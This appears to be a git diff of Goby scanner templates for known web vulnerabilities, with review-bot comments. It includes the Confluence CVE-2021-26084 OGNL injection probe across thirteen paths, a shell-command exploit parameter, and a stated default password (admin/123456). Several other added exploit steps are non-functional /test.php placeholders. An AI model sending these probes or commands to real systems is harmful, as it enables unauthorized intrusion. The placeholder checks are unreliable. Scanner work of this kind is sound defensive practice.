company=\"Atlassian\"", + "Description": "Confluence is Atlassian's professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis.", "Product": "Atlassian Confluence", "Homepage": "https://www.atlassian.com", - "Author": "luckying1314@139.com", - "Impact": "

An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.

", - "Recommendation": "

General repair suggestions:

Check and upgrade to the secure version based on the information in the affected version. The official download link is :https://www.atlassian.com/software/confluence/download-archives

Temporary repair suggestions:

If you are not ready to update the Confluence, please refer to the official notification calling for Mitigation for Linux and Windows operating systems.:https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

", + "Author": "", + "Impact": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", + "Recommendation": "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", "References": [ - "https://github.com/alt3kx/CVE-2021-26084_PoC" + "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", + "https://jira.atlassian.com/browse/CONFSERVER-67940", + "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html" ], "HasExp": true, "ExpParams": [ { - "Name": "command", + "Name": "Command", "Type": "input", "Value": "whoami" + }, + { + "Name": "Path", + "Type": "select", + "Value": "/pages/createpage-entervariables.action?SpaceKey=x,/pages/createpage-entervariables.action,/confluence/pages/createpage-entervariables.action?SpaceKey=x,/confluence/pages/createpage-entervariables.action,/wiki/pages/createpage-entervariables.action?SpaceKey=x,/wiki/pages/createpage-entervariables.action,/pages/doenterpagevariables.action,/pages/createpage.action?spaceKey=myproj,/pages/templates2/viewpagetemplate.action,/pages/createpage-entervariables.action,/template/custom/content-editor,/templates/editor-preload-container,/users/user-dark-features" } ], "ExpTips": { @@ -27,7 +34,7 @@ "Content": "" }, "ScanSteps": [ - "AND", + "OR", { "Request": { "method": "POST", 
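Review bot: `Tags` was changed from `rce` to `sqli`, which misclassifies CVE-2021-26084 — the entry's own `Impact` says the OGNL injection lets an unauthenticated attacker execute arbitrary code, and `ExpParams` takes a shell `Command`; restore `"Tags": [ "rce" ]`. Widening `GobyQuery` to `app="Confluence" || product="Confluence" || company="Atlassian"` will send the OGNL probe (and, if the operator continues, the command payload) to every Atlassian-fingerprinted host, including Jira and Bitbucket, which cannot have this bug; drop the `company` clause or scope it to Confluence. The new `Path` select is useful since the advisory lists several vulnerable actions, but `/pages/createpage-entervariables.action` appears twice in the list.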
@@ -37,12 +44,8 @@ "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", - "data": "queryString=aaaaaaaa%5Cu0027%2B%7B{{{r1}}}%2B{{{r2}}}%7D%2B%5Cu0027", - "set_variable": [ - "r1|rand|int|8", - "r2|rand|int|7", - "r4|r1|add|r2" - ] + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] }, "ResponseTest": { "type": "group", 
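Review bot: The probe was changed from random operands (`r1|rand|int|8`, `r2|rand|int|7`, expected sum `r4`) to the constant `#{16*8787}`, so every scan now sends a byte-identical request and the check in the following hunk looks for the fixed string `aaaa{140592=null}`. A constant payload is a static IDS/WAF signature, and a fixed expected value no longer proves the expression was evaluated for this request rather than matched from a cached or honeypot response; the random version gave both properties for free. Suggest keeping the three `rand`/`add` `set_variable` entries and building the map literal from them, e.g. `#{ {{{r1}}}%2b{{{r2}}} }` with an expected body of `{<r4>=null}`, if Goby's templating accepts a variable inside the braces there — I could not verify that from the diff.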
@@ -59,14 +62,420 @@ "type": "item", "variable": "$body", "operation": "contains", - "value": "{{{r4}}}", + "value": "value=\"aaaa{140592=null}", "bz": "" } ] }, - "SetVariable": [ - "output|lastbody|regex|" - ] + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/confluence/pages/createpage-entervariables.action?SpaceKey=x", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/confluence/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + 
"value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/wiki/pages/createpage-entervariables.action?SpaceKey=x", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/wiki/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/doenterpagevariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + 
"variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/createpage.action?spaceKey=myproj", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/templates2/viewpagetemplate.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": 
"value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/template/custom/content-editor", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/templates/editor-preload-container", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/users/user-dark-features", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] } ], "ExploitSteps": [ 
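Review bot: `/pages/createpage-entervariables.action` is probed twice in the new ScanSteps (the first added step at the top of this hunk and again in the step that follows `/pages/templates2/viewpagetemplate.action`), and the same path is also listed twice in the `Path` select added to ExpParams in the earlier hunk, so every scan sends a redundant POST and the exploit menu shows a duplicate option. All thirteen steps repeat the identical payload and expected value `value=\"aaaa{140592=null}`, which invites drift if the probe is ever tuned; removing the duplicate step and the duplicate select entry is the minimal fix. Since ScanSteps is now evaluated with `OR` (changed in the earlier hunk), the duplicate adds traffic without adding coverage.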
@@ -74,7 +483,7 @@ { "Request": { "method": "POST", - "uri": "/pages/createpage-entervariables.action?SpaceKey=x", + "uri": "{{{Path}}}", "follow_redirect": true, "header": { "Content-Type": "application/x-www-form-urlencoded" @@ -101,6 +510,6 @@ ] } ], - "PostTime": "2021-09-03 11:27:04", - "GobyVersion": "1.8.300" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Cacti_Weathermap_File_Write.json b/json/Cacti_Weathermap_File_Write.json index b3c1e1d..440107e 100644 --- a/json/Cacti_Weathermap_File_Write.json +++ b/json/Cacti_Weathermap_File_Write.json @@ -4,12 +4,12 @@ "Tags": [ "getshell" ], - "GobyQuery": "(app=\"cacti-监控系统\"|title=\"Login to Cacti\"|app=\"Cactiez\")", - "Description": "allows remote attackers to upload and execute arbitrary files", - "Product": "cacti-监控系统", + "GobyQuery": "app=\"cacti-监控系统\" || title=\"Login to Cacti\" || app=\"Cactiez\"", + "Description": "Cacti provides a robust and extensible operational monitoring and fault management framework for users around the world. Is also a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality.", + "Product": "cacti", "Homepage": "https://www.cacti.net/", - "Author": "aetkrad", - "Impact": "
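Review bot: The `@@ -101,6 +510,6 @@` hunk replaces a real timestamp with `"PostTime": "0000-00-00 00:00:00"` and the tool version with `"GobyVersion": "0.0.0"`; neither is a valid value, and a consumer that parses PostTime as a date will presumably reject it. Together with `"Author": ""` this strips every provenance field from the entry, so nothing records who wrote the check or when it was last validated. The same zeroing is applied to every other file visible in this commit (Cacti, ClickHouse, Consul, Datang, DedeCMS, the three Discuz entries, Docker Registry, Fastmeeting, FineReport, GitLab, H3C, IRDM4000, IceWarp). If the intent is to mark entries as unreviewed, an empty string or a dedicated field would be clearer than an impossible date.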

Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.

", + "Author": "", + "Impact": "Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.", "Recommendation": "", "References": [], "HasExp": true, @@ -121,6 +121,6 @@ ] } ], - "PostTime": "2021-11-05 13:30:24", - "GobyVersion": "1.8.302" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/ClickHouse_SQLI.json b/json/ClickHouse_SQLI.json index 75659fa..820cef1 100644 --- a/json/ClickHouse_SQLI.json +++ b/json/ClickHouse_SQLI.json @@ -4,17 +4,17 @@ "Tags": [ "sqli" ], - "GobyQuery": "(banner=\"X-Clickhouse-Summary\" | port=\"8123\")", - "Description": "ClickHouse 存在着的接口由于没有鉴权,则任意访问者都可以执行SQL语句获取数据.", + "GobyQuery": "banner=\"X-Clickhouse-Summary\" || port=\"8123\"", + "Description": "ClickHouse is an open-source column-oriented DBMS for online analytical processing that allows users to generate analytical reports using SQL queries in real-time.", "Product": "ClickHouse", - "Homepage": "https://gobies.org/", - "Author": "aetkrad", - "Impact": "", + "Homepage": "https://clickhouse.com/", + "Author": "", + "Impact": "Clickhouse has unauthorized access and can perform SQL statements to get data.", "Recommendation": "", "References": [ "https://mp.weixin.qq.com/s/xIc3Ic7N104iTogZul1LJA" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", 
@@ -98,6 +98,43 @@ ] } ], - "PostTime": "2021-12-04 18:32:14", - "GobyVersion": "1.9.310" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Consul_Rexec_RCE.json b/json/Consul_Rexec_RCE.json index 0eadbad..583669b 100644 --- a/json/Consul_Rexec_RCE.json +++ b/json/Consul_Rexec_RCE.json @@ -5,16 +5,16 @@ "rce" ], "GobyQuery": "protocol=\"consul(http)\"", - "Description": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request", + "Description": "Consul is the control plane of the service mesh. Consul is a multi-networking tool that offers a fully-featured service mesh solution that solves the networking and security challenges of operating microservices and cloud infrastructure.", "Product": "Consul", "Homepage": "https://www.consul.io/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.", "Recommendation": "", "References": [ "https://www.exploit-db.com/exploits/46073" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", 
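Review bot: The ExploitSteps added here request `/test.php` and assert that the body contains `test`, which is a placeholder rather than a check for this vulnerability, yet the preceding hunk flips `"HasExp": false` to `true`, so the entry now advertises an exploit that cannot succeed against any real ClickHouse instance and will yield misleading results. Either keep `"HasExp": false` until the steps are real, as the IRDM4000 change in this same commit does when it deletes the identical placeholder, or do not add the stub at all. The same placeholder/HasExp pairing appears in the Consul, DedeCMS, Discuz (three files), Docker Registry and FineReport hunks that follow.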
@@ -57,6 +57,43 @@ ] } ], - "PostTime": "2021-11-08 21:46:25", - "GobyVersion": "1.8.302" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Datang_AC_Default_Password.json b/json/Datang_AC_Default_Password.json index f000998..bd556a8 100644 --- a/json/Datang_AC_Default_Password.json +++ b/json/Datang_AC_Default_Password.json @@ -4,12 +4,12 @@ "Tags": [ "defaultaccount" ], - "GobyQuery": "(app=\"大唐电信AC集中管理平台\" | title=\"大唐电信AC集中管理平台\")", - "Description": "大唐AC集中管理平台默认密码admin/123456", - "Product": "大唐电信AC集中管理平台", + "GobyQuery": "app=\"大唐电信AC集中管理平台\" || title=\"大唐电信AC集中管理平台\"", + "Description": "", + "Product": "Datang Telecom AC centralized management platform", "Homepage": "http://www.datang.com/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "Datang AC centralized management platform default password admin/123456", "Recommendation": "", "References": [], "HasExp": true, @@ -99,6 +99,6 @@ ] } ], - "PostTime": "2021-11-12 19:44:34", - "GobyVersion": "1.8.302" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/DedeCMS_Carbuyaction_FileInclude.json b/json/DedeCMS_Carbuyaction_FileInclude.json index 55e1620..91c6c7d 100644 --- a/json/DedeCMS_Carbuyaction_FileInclude.json +++ b/json/DedeCMS_Carbuyaction_FileInclude.json 
@@ -5,16 +5,16 @@ "FileInclude" ], "GobyQuery": "app=\"DedeCMS\"", - "Description": "DedeCMS Carbuyaction.php页面存在本地文件包含漏洞", + "Description": "Dream Weaving (DedeCMS) Official Website- Content Management System- Shanghai Zhuozhuo Network Technology Co., Ltd.", "Product": "DedeCMS", "Homepage": "http://www.dedecms.com/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "DedeCMS Carbuyaction.php has a local file inclusion vulnerability.", "Recommendation": "", "References": [ "https://www.cnblogs.com/milantgh/p/3615986.html" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -88,6 +88,43 @@ ] } ], - "PostTime": "2021-11-13 14:18:50", - "GobyVersion": "1.8.302" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Discuz_RCE_WOOYUN_2010_080723.json b/json/Discuz_RCE_WOOYUN_2010_080723.json index e9482de..fbccd94 100644 --- a/json/Discuz_RCE_WOOYUN_2010_080723.json +++ b/json/Discuz_RCE_WOOYUN_2010_080723.json 
@@ -4,17 +4,17 @@ "Tags": [ "rce" ], - "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")", - "Description": "由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。", - "Product": "discuz", + "GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"", + "Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.", + "Product": "Discuz!", "Homepage": "https://www.discuz.net/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "Since the default value of request_order in the php.ini setting in php5.3.x version is GP, $_COOKIE is no longer included in $_REQUEST. We overwrite the global variable by passing in $GLOBALS in the cookie, resulting in a code execution vulnerability.", "Recommendation": "", "References": [ "https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -66,6 +66,43 @@ ] } ], - "PostTime": "2021-11-17 13:57:54", - "GobyVersion": "1.8.302" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Discuz_Wechat_Plugins_Unauth.json b/json/Discuz_Wechat_Plugins_Unauth.json index b0fe422..2574f35 100644 --- a/json/Discuz_Wechat_Plugins_Unauth.json +++ b/json/Discuz_Wechat_Plugins_Unauth.json 
@@ -4,17 +4,17 @@ "Tags": [ "unauth" ], - "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")", - "Description": "由Discuz论坛官方微信登录插件产生,攻击者可以利用该插件的漏洞绕过论坛的邮箱、手机号等各种验证非法创建论坛账号,通过该漏洞创建的论坛账号具备一般用户的所有权限,可以任意发帖回帖.", - "Product": "discuz", + "GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"", + "Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.", + "Product": "Discuz!", "Homepage": "https://www.discuz.net/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "Generated by the official WeChat login plug-in of Discuz Forum, attackers can use the vulnerability of this plug-in to bypass the forum's mailbox, mobile phone number and other verifications to illegally create a forum account. The forum account created through this vulnerability has all the permissions of ordinary users and can be arbitrarily Post a reply.", "Recommendation": "", "References": [ "https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -78,6 +78,43 @@ ] } ], - "PostTime": "2021-11-17 13:52:51", - "GobyVersion": "1.8.302" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Discuz_v72_SQLI.json b/json/Discuz_v72_SQLI.json index 853794d..a98fd2f 100644 --- a/json/Discuz_v72_SQLI.json 
+++ b/json/Discuz_v72_SQLI.json @@ -4,17 +4,17 @@ "Tags": [ "sqli" ], - "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")", - "Description": "discuz7.2论坛存在sql注入漏洞", - "Product": "Discuz", + "GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"", + "Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.", + "Product": "Discuz!", "Homepage": "https://www.discuz.net/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "Discuz7.2 has sql injection vulnerability.", "Recommendation": "", "References": [ "https://blog.csdn.net/weixin_40709439/article/details/82780606" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -64,6 +64,43 @@ ] } ], - "PostTime": "2021-11-16 17:48:16", - "GobyVersion": "1.8.302" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Docker_Registry_API_Unauth.json b/json/Docker_Registry_API_Unauth.json index c5df064..452783f 100644 --- a/json/Docker_Registry_API_Unauth.json +++ b/json/Docker_Registry_API_Unauth.json 
@@ -1,20 +1,20 @@ { "Name": "Docker Registry API Unauth", - "Level": "2", + "Level": "1", "Tags": [ "unauth" ], "GobyQuery": "header=\"registry/2.0\"", - "Description": "Docker Registry API 存在未授权访问漏洞,黑客可通过API下载docker images,导致敏感信息泄露。", + "Description": "Docker is a set of platform as a service products that use OS-level virtualization to deliver software in packages called containers.", "Product": "Docker Registry", "Homepage": "https://docs.docker.com/registry/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "There is an unauthorized access vulnerability in the Docker Registry API. Docker images can be downloaded through the API, resulting in the disclosure of sensitive information.", "Recommendation": "", "References": [ "https://www.freeaihub.com/post/6085.html" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -98,6 +98,43 @@ ] } ], - "PostTime": "2021-11-27 14:21:33", - "GobyVersion": "1.9.310" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Fastmeeting_Arbitrary_File_Read.json b/json/Fastmeeting_Arbitrary_File_Read.json index 1605698..6406411 100644 --- a/json/Fastmeeting_Arbitrary_File_Read.json +++ b/json/Fastmeeting_Arbitrary_File_Read.json 
@@ -1,15 +1,15 @@ { - "Name": "好视通云会议存在任意文件读取漏洞", + "Name": "Fastmeeting Arbitrary File Read", "Level": "2", "Tags": [ "fileread" ], "GobyQuery": "body=\"深圳银澎云计算有限公司\"", - "Description": "好视通云会议存在任意文件读取漏洞", - "Product": "好视通云会议", + "Description": "hst", + "Product": "hst", "Homepage": "https://www.hst.com/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "Fastmeeting Arbitrary File Read", "Recommendation": "", "References": [ "https://mp.weixin.qq.com/s/fMNE1PF5n81O1BpoDRlYkA" @@ -100,6 +100,6 @@ ] } ], - "PostTime": "2021-12-11 14:50:39", - "GobyVersion": "1.9.310" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/FineReport_v9_Arbitrary_File_Overwrite.json b/json/FineReport_v9_Arbitrary_File_Overwrite.json index 1e72124..56a369b 100644 --- a/json/FineReport_v9_Arbitrary_File_Overwrite.json +++ b/json/FineReport_v9_Arbitrary_File_Overwrite.json @@ -5,16 +5,16 @@ "overwrite" ], "GobyQuery": "app=\"fanruansem-FineReport\"", - "Description": "由于在初始化svg文件时,未对传入的参数做限制,导致可以对已存在的文件覆盖写入数据,从而通过将木马写入jsp文件中获取服务器权限", - "Product": "帆软-FineReport", + "Description": "FineReport is an web reporting tool.", + "Product": "fanruan-FineReport", "Homepage": "https://www.fanruan.com/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "Since there is no restriction on the incoming parameters when initializing the svg file, data can be overwritten to the existing file, so that the server permission can be obtained by writing the Trojan into the jsp file.", "Recommendation": "", "References": [ "https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", 
